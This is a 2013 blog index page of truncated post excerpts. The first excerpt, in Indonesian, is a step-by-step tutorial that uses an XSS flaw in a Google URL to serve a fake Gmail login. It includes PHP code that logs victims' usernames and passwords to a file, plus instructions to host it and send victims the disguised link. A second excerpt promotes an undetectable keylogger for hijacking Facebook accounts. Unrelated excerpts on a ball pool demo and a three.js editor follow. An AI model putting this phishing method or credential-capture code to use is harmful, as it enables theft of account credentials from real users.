Sabtu, 09 Februari 2013

Memanfaatkan Bug XSS di Google untuk Phishing (Fake Gmail Login)

Tutorial kali ini membuat Fake gmail login dengan memanfaatkan Bug XSS yang ada di situs Google dengan alamat url http://www.google.com/ig/directory?url=1. Buat coding dengan format XML, seperti ini http://inwepo.com/test/google.xml2. Buat coding PHP, berikut ini :<?php$username = $_POST['username'];$password = $_POST['password'];$logs = "save.txt";$ld = fopen($logs, 'a') or die(" ");$data = "$username:$password \n";fwrite($ld, $data);echo "Sorry this is Phishing!";?>Simpan dengan nama save.php3. Kemudian upload semua script ke hosting kamu.4. Akses dengan alamat sesuai nama domain kamu contohnya http://www.google.com/ig/directory?url=inwepo.com/test/google.xml5....


Hack Facebook Account Using FUD / Undectable MAC Keylogger 2013

Hack Facebook Account Using FUD / Undectable MAC Keylogger 2013Now days Facebook is the biggest and most popular social networking website as compare to Twitter website. However along with the growing popularity of Facebook, Facebook is also gaining a wide attention of black and gray hat hackers as well.There are lots of Password Hacking tools are available on internet which you can use to hack victim account password. Keylogger or Spyware hacking tool is one of them and it is the best password hacking tool as compare to other email hacking software, because normal users who are not computer expert can also easily use it. But most of those hacking...


Project Ball Pool

Project of Ball Pool Ball Pool body { overflow: hidden; background-color: #000000; user-select: none; -webkit-user-select: none; -moz-user-select: none; -o-user-select: none; -ms-user-select: none; } var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); try { var pageTracker = _gat._getTracker("UA-86951-7"); pageTracker._trackPageview(); } catch(err) ...


code_editor

code_editor                                              body { background-color: #ffffff; margin: 0; overflow: hidden; } // workaround for chrome bug: http://code.google.com/p/chromium/issues/detail?id=35980#c12 if ( window.innerWidth === 0 ) { window.innerWidth = parent.innerWidth; window.innerHeight = parent.innerHeight; } var camera, scene, renderer; var geometry, material, mesh; init(); animate(); function init() { camera = new THREE.PerspectiveCamera( 75, window.innerWidth...


Pages 381234 »